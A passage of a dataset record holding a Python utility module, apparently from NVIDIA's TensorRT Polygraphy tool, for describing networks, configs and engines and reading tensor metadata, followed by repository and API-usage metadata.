\"IConstantLayer\")\n try_add(\"RNN\", \"IRNNLayer\")\n try_add(\"RNN_V2\", \"IRNNv2Layer\")\n try_add(\"IDENTITY\", \"IIdentityLayer\")\n try_add(\"PLUGIN_V2\", \"IPluginV2Layer\")\n try_add(\"SLICE\", \"ISliceLayer\")\n try_add(\"SHAPE\", \"IShapeLayer\")\n try_add(\"PARAMETRIC_RELU\", \"IParametricReLULayer\")\n try_add(\"RESIZE\", \"IResizeLayer\")\n try_add(\"TRIP_LIMIT\", \"ITripLimitLayer\")\n try_add(\"RECURRENCE\", \"IRecurrenceLayer\")\n try_add(\"ITERATOR\", \"IIteratorLayer\")\n try_add(\"LOOP_OUTPUT\", \"ILoopOutputLayer\")\n try_add(\"SELECT\", \"ISelectLayer\")\n try_add(\"FILL\", \"IFillLayer\")\n try_add(\"QUANTIZE\", \"IQuantizeLayer\")\n try_add(\"DEQUANTIZE\", \"IDequantizeLayer\")\n try_add(\"CONDITION\", \"IConditionLayer\")\n try_add(\"CONDITIONAL_INPUT\", \"IIfConditionalInputLayer\")\n try_add(\"CONDITIONAL_OUTPUT\", \"IIfConditionalOutputLayer\")\n try_add(\"ASSERTION\", \"IAssertionLayer\")\n try_add(\"SCATTER\", \"IScatterLayer\")\n try_add(\"EINSUM\", \"IEinsumLayer\")\n try_add(\"GRID_SAMPLE\", \"IGridSampleLayer\")\n try_add(\"ONE_HOT\", \"IOneHotLayer\")\n try_add(\"NON_ZERO\", \"INonZeroLayer\")\n try_add(\"NMS\", \"INMSLayer\")\n try_add(\"REVERSE_SEQUENCE\", \"IReverseSequenceLayer\")\n try_add(\"NORMALIZATION\", \"INormalizationLayer\")\n try_add(\"CAST\", \"ICastLayer\")\n\n return layer_class_mapping\n\ndef check_numpy_trt_compatibility():\n if mod.version(trt.__version__) < mod.version(\"8.6\") and \\\n mod.version(np.__version__) >= mod.version(\"1.24\"):\n # TensorRT < 8.6 uses a deprecated alias np.bool that was removed in NumPy >= 1.24\n G_LOGGER.warning(f\"TensorRT version {trt.__version__} and NumPy version {np.__version__} \"\n \"are not compatible. 
Consider downgrading your NumPy package to a version < 1.24 \"\n \"or upgrading TensorRT to a version >= 8.6.\", mode=LogMode.ONCE)\n\n\ndef np_dtype_from_trt(trt_dtype):\n # trt.nptype uses NumPy, so to make autoinstall work, we need to trigger it before that.\n mod.autoinstall(np)\n check_numpy_trt_compatibility()\n return np.dtype(trt.nptype(trt_dtype))\n\n\ndef get_network_input_names_meta(network):\n names = []\n meta = TensorMetadata()\n for i in range(network.num_inputs):\n tensor = network.get_input(i)\n names.append(tensor.name)\n meta.add(name=tensor.name, dtype=np_dtype_from_trt(tensor.dtype), shape=tensor.shape)\n return names, meta\n\n\ndef get_network_output_names_meta(network):\n names = []\n meta = TensorMetadata()\n for i in range(network.num_outputs):\n tensor = network.get_output(i)\n names.append(tensor.name)\n meta.add(name=tensor.name, dtype=np_dtype_from_trt(tensor.dtype), shape=tensor.shape)\n return names, meta\n\n\ndef get_layer_input_names_meta(layer):\n names = []\n meta = TensorMetadata()\n for i in range(layer.num_inputs):\n inp = layer.get_input(i)\n if inp:\n names.append(inp.name)\n meta.add(inp.name, np_dtype_from_trt(inp.dtype), inp.shape)\n return names, meta\n\n\ndef get_layer_output_names_meta(layer):\n names = []\n meta = TensorMetadata()\n for i in range(layer.num_outputs):\n out = layer.get_output(i)\n if out:\n names.append(out.name)\n meta.add(out.name, np_dtype_from_trt(out.dtype), out.shape)\n return names, meta\n\n\ndef str_from_layer(layer, index):\n input_names, input_meta = get_layer_input_names_meta(layer)\n output_names, output_meta = get_layer_output_names_meta(layer)\n return util.str_from_layer(\n \"Layer\", index, layer.name, layer.type, input_names, input_meta, output_names, output_meta\n )\n\n\ndef get_layer_attribute_names(layer):\n def is_special_attribute(attr):\n return attr.startswith(\"__\") and attr.endswith(\"__\")\n\n def is_valid_attribute(attr, layer):\n if (\n type(layer) == trt.IPoolingLayer\n or type(layer) == trt.IConvolutionLayer\n or type(layer) == trt.IDeconvolutionLayer\n ):\n if len(layer.get_input(0).shape) > 4:\n # 3D pooling uses padding_nd\n return attr not in [\"padding\", \"stride\", \"window_size\"]\n if type(layer) == trt.IResizeLayer:\n if layer.num_inputs > 1:\n return attr not in [\"scales\"]\n if type(layer) == trt.ISliceLayer:\n if layer.num_inputs > 1:\n return attr not in [\"shape\", \"start\", \"stride\"]\n return True\n\n return [\n attr\n for attr in dir(layer)\n if not is_special_attribute(attr) and not hasattr(trt.ILayer, attr) and is_valid_attribute(attr, layer)\n ]\n\n\ndef str_from_network(network, show_layers=None, show_attrs=None, show_weights=None):\n \"\"\"\n Converts a TensorRT network to a human-readable representation\n\n Args:\n network (trt.INetworkDefinition): The network.\n show_layers (bool): Whether to display per-layer information.\n show_attrs (bool): Whether to display per-layer attributes.\n show_weights (bool): Whether to display the value of weights.\n\n Returns:\n str\n \"\"\"\n show_layers = util.default(show_layers, False)\n show_attrs = util.default(show_attrs, False)\n show_weights = util.default(show_weights, False)\n\n LAYER_TYPE_CLASS_MAPPING = get_layer_class_mapping()\n\n network_str = f\"Name: {network.name} | {'Implicit' if hasattr(network, 'has_implicit_batch_dimension') and network.has_implicit_batch_dimension else 'Explicit'} Batch Network{' with Explicit Precision ' if hasattr(network, 'has_explicit_precision') and network.has_explicit_precision else 
''}\\n\"\n network_str += \"\\n\"\n\n _, input_metadata = get_network_input_names_meta(network)\n network_str += f\"---- {len(input_metadata)} Network Input(s) ----\\n{input_metadata}\\n\\n\"\n _, output_metadata = get_network_output_names_meta(network)\n network_str += f\"---- {len(output_metadata)} Network Output(s) ----\\n{output_metadata}\\n\\n\"\n network_str += f\"---- {network.num_layers} Layer(s) ----\\n\"\n if show_layers:\n for index, layer in enumerate(network):\n if layer.type in LAYER_TYPE_CLASS_MAPPING:\n layer.__class__ = LAYER_TYPE_CLASS_MAPPING[layer.type]\n\n network_str += str_from_layer(layer, index)\n\n if show_attrs:\n # Exclude special attributes, as well as any attributes of the base layer class (those can be displayed above).\n attrs = get_layer_attribute_names(layer)\n if attrs:\n network_str += util.indent_block(\"---- Attributes ----\") + \"\\n\"\n for attr in attrs:\n with G_LOGGER.verbosity():\n val = getattr(layer, attr)\n if show_weights or not isinstance(val, np.ndarray):\n attr_str = \"\"\n if layer.name:\n attr_str += f\"{layer.name}.\"\n network_str += util.indent_block(f\"{attr_str}{attr} = {val}\") + \"\\n\"\n network_str += \"\\n\"\n\n return util.indent_block(network_str, level=0)\n\n\ndef get_all_tensors(network):\n all_tensors = set()\n for layer in network:\n for i in range(layer.num_inputs):\n all_tensors.add(layer.get_input(i))\n for i in range(layer.num_outputs):\n all_tensors.add(layer.get_output(i))\n # Optional tensors that are omitted are reported as `None`s, so we need to exclude them.\n return {t.name: t for t in all_tensors if t is not None}\n\n\ndef mark_outputs(network, outputs):\n \"\"\"\n Mark the specified outputs as network outputs.\n\n Args:\n network (trt.INetworkDefinition): The network in which to mark outputs.\n outputs (Sequence[str]): The names of tensors to mark as outputs.\n \"\"\"\n outputs = util.unique_list(outputs)\n\n tensor_map = get_all_tensors(network)\n util.check_sequence_contains(\n tensor_map.keys(), outputs, name=\"the network\", items_name=\"outputs\", check_extra=False\n )\n\n for tensor in tensor_map.values():\n # Clear all old outputs\n if tensor.is_network_output:\n network.unmark_output(tensor)\n\n for name in outputs:\n G_LOGGER.ultra_verbose(f\"Marking {name} as an output\")\n network.mark_output(tensor_map[name])\n\n\ndef mark_layerwise(network):\n # Layers within loops cannot be marked as network outputs.\n LOOP_START_NAMES = [\"TRIP_LIMIT\", \"ITERATOR\", \"RECURRENCE\"]\n LOOP_END_NAMES = [\"LOOP_OUTPUT\"]\n LOOP_START_LAYERS = [getattr(trt.LayerType, attr) for attr in LOOP_START_NAMES if hasattr(trt.LayerType, attr)]\n LOOP_END_LAYERS = [getattr(trt.LayerType, attr) for attr in LOOP_END_NAMES if hasattr(trt.LayerType, attr)]\n EXCLUDE_LAYERS = [trt.LayerType.SHAPE, trt.LayerType.CONSTANT]\n outputs = []\n in_loop = False\n for layer in network:\n if layer.type in LOOP_START_LAYERS:\n G_LOGGER.warning(\n \"Loop detected. 
Please ensure the network is topologically sorted so that layers within \"\n \"the loop body are not marked as network outputs in layerwise mode\",\n mode=LogMode.ONCE,\n )\n in_loop = True\n elif layer.type in LOOP_END_LAYERS:\n in_loop = False\n\n should_mark_layer = not in_loop and layer.type not in EXCLUDE_LAYERS\n if should_mark_layer:\n for index in range(layer.num_outputs):\n tensor = layer.get_output(index)\n if tensor is not None:\n outputs.append(tensor.name)\n\n G_LOGGER.verbose(f\"Marking {len(outputs)} tensors as outputs\")\n mark_outputs(network, outputs)\n\n\ndef unmark_outputs(network, outputs):\n outputs = util.unique_list(outputs)\n\n tensor_map = get_all_tensors(network)\n util.check_sequence_contains(\n tensor_map.keys(), outputs, name=\"the network\", items_name=\"outputs\", check_extra=False\n )\n\n for name in outputs:\n tensor = tensor_map[name]\n if tensor.is_network_output:\n network.unmark_output(tensor)\n\n\ndef str_from_config(config):\n # Check the default device type so that we can trigger this from the tests.\n # On non-DLA platforms, config.DLA_core can never be set to anything other than -1,\n # but default_device_type can be set to DLA..\n using_dla = config.DLA_core >= 0 or config.default_device_type == trt.DeviceType.DLA\n\n lines = []\n\n def str_from_list(lst):\n return \"[\" + \", \".join(lst) + \"]\"\n\n def add_line(title, line):\n lines.append((f\"{title:{22}} | \" + line).strip())\n\n def get_enabled_enum_vals(EnumType, is_enabled):\n # is_enabled is a Callable[[enum_val], bool] which reports whether to include the enum value.\n return [name for name, enum_val in EnumType.__members__.items() if is_enabled(enum_val)]\n\n # Flags\n enabled_builder_flags = get_enabled_enum_vals(trt.BuilderFlag, lambda flag: config.get_flag(flag))\n add_line(\"Flags\", f\"{str_from_list(enabled_builder_flags)}\")\n\n # Engine Capability\n with contextlib.suppress(AttributeError):\n add_line(\"Engine Capability\", str(config.engine_capability))\n\n # Memory Pools\n with contextlib.suppress(AttributeError):\n mem_pool_limits = [\n f\"{name}: {config.get_memory_pool_limit(pool_type) / float(1<<20):.2f} MiB\"\n for name, pool_type in trt.MemoryPoolType.__members__.items()\n # Only show DLA memory pools when DLA is in use\n if (not name.startswith(\"DLA\") or using_dla)\n ]\n add_line(\"Memory Pools\", f\"{str_from_list(mem_pool_limits)}\")\n\n # Tactic Sources\n with contextlib.suppress(AttributeError):\n source_vals = get_enabled_enum_vals(trt.TacticSource, lambda val: (1 << int(val)) & config.get_tactic_sources())\n add_line(\"Tactic Sources\", f\"{str_from_list(source_vals)}\")\n\n # DLA\n if using_dla:\n add_line(\"DLA\", f\"Default Device Type: {config.default_device_type}, Core: {config.DLA_core}\")\n\n # Profiling Verbosity\n with contextlib.suppress(AttributeError):\n add_line(\"Profiling Verbosity\", f\"{config.profiling_verbosity}\")\n\n # Optimization Profiles\n if config.num_optimization_profiles > 1: # Not particularly interesting unless there are multiple.\n add_line(\"Optimization Profiles\", f\"{config.num_optimization_profiles} profile(s)\")\n\n # Preview Features\n with contextlib.suppress(AttributeError):\n feature_vals = get_enabled_enum_vals(trt.PreviewFeature, lambda val: config.get_preview_feature(val))\n if feature_vals:\n add_line(\"Preview Features\", f\"{str_from_list(feature_vals)}\")\n\n # Calibrator\n if config.int8_calibrator:\n add_line(\"Calibrator\", f\"{config.int8_calibrator}\")\n\n return \"\\n\".join(lines)\n\n\ndef 
check_profile(profile):\n if not bool(profile):\n G_LOGGER.critical(f\"Profile is not valid, please provide profile data.\\nNote: profile was: {profile}\")\n return profile\n\n\ndef str_from_tensor(tensor, is_shape_tensor):\n ret = \"Input \"\n if is_shape_tensor:\n ret += \"shape-tensor\"\n else:\n ret += \"tensor\"\n ret += f\": {tensor.name} (dtype={tensor.dtype}, shape={tensor.shape})\"\n return ret\n\n\n# Note: When `force_opt_shapes=True` this method is treated as being specific to calibration.\ndef get_input_metadata_from_network(network, profile, force_opt_shapes=None):\n \"\"\"\n Returns metadata about the inputs of a network, referring to the values\n set in a profile for dynamic shapes.\n\n Args:\n network (trt.INetworkDefinition):\n The network the profile applies to.\n profile (trt.IOptimizationProfile):\n The profile from which to retrieve input metadata.\n\n force_opt_shapes (bool):\n Whether to ignore the minimum and maximum shapes in the profile\n and always use OPT shapes.\n Defaults to False.\n\n Returns:\n TensorMetadata:\n A mapping of input names to their types and shapes.\n Shapes are retrieved from the OPT values in the profile.\n\n Raises:\n PolygraphyException:\n If the network has dynamic shapes or shape tensor inputs but no profile\n was provided.\n \"\"\"\n force_opt_shapes = util.default(force_opt_shapes, False)\n\n input_metadata = TensorMetadata()\n for index in range(network.num_inputs):\n tensor = network.get_input(index)\n # Only access the profile if we actually need to.\n # This way, this method works with static networks even without a profile set.\n min_shape = None\n max_shape = None\n opt_shape = tensor.shape\n if tensor.is_shape_tensor or util.is_shape_dynamic(tensor.shape):\n if tensor.is_shape_tensor:\n min_shape, opt_shape, max_shape = profile.get_shape_input(tensor.name)\n else:\n min_shape, opt_shape, max_shape = profile.get_shape(tensor.name)\n\n if force_opt_shapes and tuple(min_shape) != tuple(max_shape):\n G_LOGGER.warning(\n \"TensorRT does not currently support using dynamic shapes during calibration. \"\n \"The `OPT` shapes from the calibration profile will be used for tensors with dynamic shapes. \"\n \"Calibration data is expected to conform to those shapes. 
\",\n mode=LogMode.ONCE,\n )\n\n input_metadata.add(\n name=tensor.name,\n dtype=np_dtype_from_trt(tensor.dtype),\n shape=opt_shape if force_opt_shapes else tensor.shape,\n min_shape=None if force_opt_shapes else min_shape,\n max_shape=None if force_opt_shapes else max_shape,\n )\n return input_metadata\n\n\n# calib_profile parameter is used to bypass `get_calibration_profile()` to make this work on TRT 7.0 and older.\ndef try_setup_polygraphy_calibrator(config, network, calib_profile=None):\n \"\"\"\n Tries to call setup methods specific to Polygraphy calibrators.\n Returns early if there is no calibrator or if it is not a Polygraphy calibrator.\n \"\"\"\n calibrator = config.int8_calibrator\n if calibrator is None or not (\n hasattr(calibrator, \"is_polygraphy_calibrator\") and calibrator.is_polygraphy_calibrator\n ):\n # No calibrator or not a Polygraphy calibrator.\n return\n\n if calib_profile is None:\n try:\n calib_profile = config.get_calibration_profile()\n except AttributeError:\n G_LOGGER.extra_verbose(\"Cannot get calibration profile on TensorRT 7.0 and older.\")\n # Return early so we don't emit extraneous warnings on TRT 7.0 and older.\n return\n\n try:\n # TensorRT does not currently support shapes other than the OPT shape.\n input_metadata = get_input_metadata_from_network(network, calib_profile, force_opt_shapes=True)\n except PolygraphyException as err:\n G_LOGGER.warning(\n \"Could not determine input_metadata to provide to the calibrator because no calibration profile is set. \"\n \"Please either set a calibration profile in the config or call `calibrator.set_input_metadata()` manually. \"\n f\"\\nNote: Error was:\\n{err}\",\n mode=LogMode.ONCE,\n )\n else:\n calibrator.set_input_metadata(input_metadata)\n\n\ndef get_hwc_shape_from_chw(shape, strides):\n # The relative size (descending sorted order) of the strides should give the permutation to convert the shape\n perm = sorted(range(len(strides)), key=strides.__getitem__, reverse=True)\n return tuple([shape[i] for i in perm])\n\n\ndef get_chw_shape_from_hwc(shape, strides):\n perm = sorted(range(len(strides)), key=strides.__getitem__, reverse=True)\n inv_perm = sorted(range(len(perm)), key=perm.__getitem__)\n return tuple([shape[i] for i in inv_perm])\n\n\ndef get_metadata_from_engine(engine, context, mode):\n meta = TensorMetadata()\n for idx in range(engine.num_io_tensors):\n name = engine.get_tensor_name(idx)\n if engine.get_tensor_mode(name) != mode:\n continue\n\n shape = engine.get_tensor_shape(name)\n # If the input format is HWC, make sure the input is shaped accordingly\n if engine.get_tensor_format(name) == trt.TensorFormat.HWC:\n shape = get_hwc_shape_from_chw(shape, context.get_tensor_strides(name))\n\n meta.add(name=name, dtype=np_dtype_from_trt(engine.get_tensor_dtype(name)), shape=shape)\n return meta\n\n\ndef str_from_engine(engine, context, show_layers=None, show_attrs=None):\n show_layers = util.default(show_layers, False)\n show_attrs = util.default(show_attrs, False)\n\n if _should_use_v3_api():\n num_io_tensors = engine.num_io_tensors\n else:\n num_io_tensors = get_bindings_per_profile(engine)\n\n engine_str = f\"Name: {engine.name} | {'Refittable ' if engine.refittable else ''}{'Implicit' if hasattr(engine, 'has_implicit_batch_dimension') and engine.has_implicit_batch_dimension else 'Explicit'} Batch Engine\\n\"\n engine_str += \"\\n\"\n\n # Show metadata for the first profile (i.e. 
the dynamic shapes)\n if _should_use_v3_api():\n input_metadata = get_metadata_from_engine(engine, context, mode=trt.TensorIOMode.INPUT)\n output_metadata = get_metadata_from_engine(engine, context, mode=trt.TensorIOMode.OUTPUT)\n else:\n input_metadata = get_input_metadata_from_engine(engine, 0, num_io_tensors)\n output_metadata = get_output_metadata_from_engine(engine, 0, num_io_tensors)\n\n engine_str += f\"---- {len(input_metadata)} Engine Input(s) ----\\n{input_metadata}\\n\\n\"\n engine_str += f\"---- {len(output_metadata)} Engine Output(s) ----\\n{output_metadata}\\n\\n\"\n\n engine_str += f\"---- Memory ----\\nDevice Memory: {engine.device_memory_size} bytes\\n\\n\"\n\n engine_str += f\"---- {engine.num_optimization_profiles} Profile(s) ({num_io_tensors} Tensor(s) Each) ----\\n\"\n for profile_index in range(engine.num_optimization_profiles):\n engine_str += f\"- Profile: {profile_index}\\n\"\n\n if _should_use_v3_api():\n max_width = max([len(engine.get_tensor_name(idx)) for idx in range(engine.num_io_tensors)]) + 8\n else:\n max_width = max([len(binding) for binding in engine]) + 8\n\n for idx in range(num_io_tensors):\n if _should_use_v3_api():\n name = engine.get_tensor_name(idx)\n binding_type = \" (Input)\" if engine.get_tensor_mode(name) == trt.TensorIOMode.INPUT else \"(Output)\"\n engine_str += util.indent_block(f\"Tensor: {name:<{max_width}} {binding_type}, Index: {idx}\")\n\n if engine.get_tensor_mode(name) == trt.TensorIOMode.INPUT:\n min_shape, opt_shape, max_shape = engine.get_tensor_profile_shape(name, profile_index)\n engine_str += f\" | Shapes: min={min_shape}, opt={opt_shape}, max={max_shape}\\n\"\n else:\n engine_str += f\" | Shape: {engine.get_tensor_shape(name)}\\n\"\n else:\n binding = profile_index * num_io_tensors + idx\n name = f\"[Name: {engine.get_binding_name(binding)}]\"\n binding_type = \"(Input) \" if engine.binding_is_input(binding) else \"(Output)\"\n engine_str += util.indent_block(f\"Binding Index: {binding} {binding_type} {name:<{max_width}}\")\n\n if engine.binding_is_input(binding):\n if engine.is_shape_binding(binding):\n min_shape, opt_shape, max_shape = engine.get_profile_shape_input(profile_index, binding)\n else:\n min_shape, opt_shape, max_shape = engine.get_profile_shape(profile_index, binding)\n engine_str += f\" | Shapes: min={min_shape}, opt={opt_shape}, max={max_shape}\\n\"\n else:\n engine_str += f\" | Shape: {engine.get_binding_shape(binding)}\\n\"\n engine_str += \"\\n\"\n\n layers_per_profile = engine.num_layers // engine.num_optimization_profiles\n engine_str += (\n f\"---- {layers_per_profile} Layer(s){' Per Profile' if engine.num_optimization_profiles > 1 else ''} ----\\n\"\n )\n if show_layers:\n try:\n inspector = engine.create_engine_inspector()\n except AttributeError:\n G_LOGGER.warning(\n f\"Cannot show layer information because IEngineInspector is not available in this version of TensorRT ({trt.__version__})\"\n )\n else:\n for profile_idx in range(engine.num_optimization_profiles):\n indent_level = 0\n if engine.num_optimization_profiles >= 1:\n indent_level = 1\n engine_str += f\"- Profile: {profile_idx}\\n\"\n\n offset = profile_idx * layers_per_profile\n for index in range(layers_per_profile):\n layer_info = json.loads(\n inspector.get_layer_information(offset + index, trt.LayerInformationFormat.JSON)\n )\n\n op = \"Unknown\"\n input_names, input_meta = [], TensorMetadata()\n output_names, output_meta = [], TensorMetadata()\n origin = \"Unknown\"\n tactic = \"Unknown\"\n if engine.profiling_verbosity == 
trt.ProfilingVerbosity.DETAILED:\n name = layer_info.get(\"Name\", \"Unknown\")\n op = layer_info.get(\"LayerType\", \"Unknown\")\n\n def names_meta_from_inspector(key):\n names = []\n meta = TensorMetadata()\n info = layer_info.get(key)\n if info is None:\n return meta\n for elem in info:\n names.append(elem[\"Name\"])\n meta.add(name=elem[\"Name\"], dtype=None, shape=elem[\"Dimensions\"])\n return names, meta\n\n input_names, input_meta = names_meta_from_inspector(\"Inputs\")\n output_names, output_meta = names_meta_from_inspector(\"Outputs\")\n origin = layer_info.get(\"Origin\", \"Unknown\")\n tactic = layer_info.get(\"TacticValue\", \"Unknown\")\n else:\n G_LOGGER.warning(\n f\"This engine was created with a profiling verbosity of: {engine.profiling_verbosity}. Some layer information may be missing. Try setting a higher profiling verbosity to see more detailed layer information. \",\n mode=LogMode.ONCE,\n )\n name = layer_info\n\n engine_str += (\n util.indent_block(\n util.str_from_layer(\n \"Layer\", index, name, op, input_names, input_meta, output_names, output_meta\n ),\n indent_level,\n )\n + \"\\n\"\n )\n\n if show_attrs:\n engine_str += util.indent_block(\"---- Attributes ----\", indent_level + 1) + \"\\n\"\n engine_str += util.indent_block(f\"Origin = {origin}\", indent_level + 1) + \"\\n\"\n engine_str += util.indent_block(f\"Tactic = {tactic}\", indent_level + 1) + \"\\n\"\n\n engine_str += \"\\n\"\n\n return util.indent_block(engine_str, level=0)\n\n\n# V2 APIs\ndef add_binding_to_metadata(engine, binding, metadata, name_binding):\n if _should_use_v3_api():\n G_LOGGER.internal_error(\"This function should not be called when using the V3 API\")\n\n # name_binding always comes from profile 0, since that's where we\n # get all binding names in the runner\n metadata.add(\n name=engine[name_binding],\n dtype=np_dtype_from_trt(engine.get_binding_dtype(binding)),\n shape=list(engine.get_binding_shape(binding)),\n )\n\n\ndef get_input_metadata_from_engine(engine, start_binding, end_binding):\n if _should_use_v3_api():\n G_LOGGER.internal_error(\"This function should not be called when using the V3 API\")\n\n inputs = TensorMetadata()\n for index, binding in enumerate(range(start_binding, end_binding)):\n if engine.binding_is_input(binding):\n add_binding_to_metadata(engine, binding, inputs, name_binding=index)\n return inputs\n\n\ndef get_output_metadata_from_engine(engine, start_binding, end_binding):\n if _should_use_v3_api():\n G_LOGGER.internal_error(\"This function should not be called when using the V3 API\")\n\n outputs = TensorMetadata()\n for index, binding in enumerate(range(start_binding, end_binding)):\n if not engine.binding_is_input(binding):\n add_binding_to_metadata(engine, binding, outputs, name_binding=index)\n return outputs\n\n\ndef get_bindings_per_profile(engine):\n if _should_use_v3_api():\n G_LOGGER.internal_error(\"This function should not be called when using the V3 API\")\n\n return engine.num_bindings // engine.num_optimization_profiles\n\n\ndef get_active_profile_bindings(context):\n \"\"\"\n Gets the start and end binding indices for the active optimization profile.\n\n Args:\n engine (trt.ICudaEngine): The engine in question.\n context (trt.IExecutionContext): The context where the profile is currently set.\n\n Returns:\n Tuple[int, int]: The start and end bindings indices, in that order\n \"\"\"\n if _should_use_v3_api():\n G_LOGGER.internal_error(\"This function should not be called when using the V3 API\")\n\n active_profile = 
context.active_optimization_profile\n if active_profile < 0:\n G_LOGGER.critical(\n f\"Cannot determine profile bindings since the optimization profile for this context is set to: {active_profile}\"\n )\n\n bindings_per_profile = get_bindings_per_profile(context.engine)\n\n start_binding = bindings_per_profile * active_profile\n end_binding = start_binding + bindings_per_profile\n\n G_LOGGER.ultra_verbose(\n f\"Total # of Profiles: {context.engine.num_optimization_profiles}, Bindings Per Profile: {bindings_per_profile}, \"\n f\"Active Profile: {active_profile}, Start Binding: {start_binding}, End Binding: {end_binding}\"\n )\n return start_binding, end_binding\n", "repo_name": "NVIDIA/TensorRT", "sub_path": "tools/Polygraphy/polygraphy/backend/trt/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 32219, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8187, "dataset": "github-code", "pt": "53", "api": [{"api_name": "polygraphy.mod.lazy_import", "line_number": 11, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 11, "usage_type": "name"}, {"api_name": "polygraphy.mod.lazy_import", "line_number": 12, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 12, "usage_type": "name"}, {"api_name": "polygraphy.mod.version", "line_number": 29, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 29, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.error", "line_number": 39, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 39, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.error", "line_number": 40, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 40, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 42, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 42, "usage_type": "name"}, {"api_name": "polygraphy.logger.LogMode.ONCE", "line_number": 42, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.LogMode", "line_number": 42, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.verbose", "line_number": 43, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 43, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.extra_verbose", "line_number": 44, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 44, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.super_verbose", "line_number": 45, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 45, "usage_type": "name"}, {"api_name": "os.kill", "line_number": 51, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 51, "usage_type": "call"}, {"api_name": "signal.SIGTERM", "line_number": 51, "usage_type": "attribute"}, {"api_name": "polygraphy.mod.export", "line_number": 18, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 18, "usage_type": "name"}, {"api_name": "polygraphy.mod.version", "line_number": 61, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 61, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.backtrace", "line_number": 65, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 65, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.critical", "line_number": 66, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", 
"line_number": 66, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.error", "line_number": 72, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 72, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.critical", "line_number": 73, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 73, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.critical", "line_number": 76, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 76, "usage_type": "name"}, {"api_name": "polygraphy.config.INTERNAL_CORRECTNESS_CHECKS", "line_number": 87, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 87, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 88, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 88, "usage_type": "name"}, {"api_name": "polygraphy.mod.version", "line_number": 145, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 145, "usage_type": "name"}, {"api_name": "polygraphy.mod.version", "line_number": 146, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 146, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 148, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 148, "usage_type": "name"}, {"api_name": "polygraphy.logger.LogMode.ONCE", "line_number": 150, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.LogMode", "line_number": 150, "usage_type": "name"}, {"api_name": "polygraphy.mod.autoinstall", "line_number": 155, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 155, "usage_type": "name"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 162, "usage_type": "call"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 172, "usage_type": "call"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 182, "usage_type": "call"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 193, "usage_type": "call"}, {"api_name": "polygraphy.util.str_from_layer", "line_number": 205, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 205, "usage_type": "name"}, {"api_name": "polygraphy.util.default", "line_number": 251, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 251, "usage_type": "name"}, {"api_name": "polygraphy.util.default", "line_number": 252, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 252, "usage_type": "name"}, {"api_name": "polygraphy.util.default", "line_number": 253, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 253, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 276, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 276, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.verbosity", "line_number": 278, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 278, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 284, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 284, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 287, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 287, "usage_type": "name"}, {"api_name": "polygraphy.util.unique_list", "line_number": 309, "usage_type": "call"}, {"api_name": 
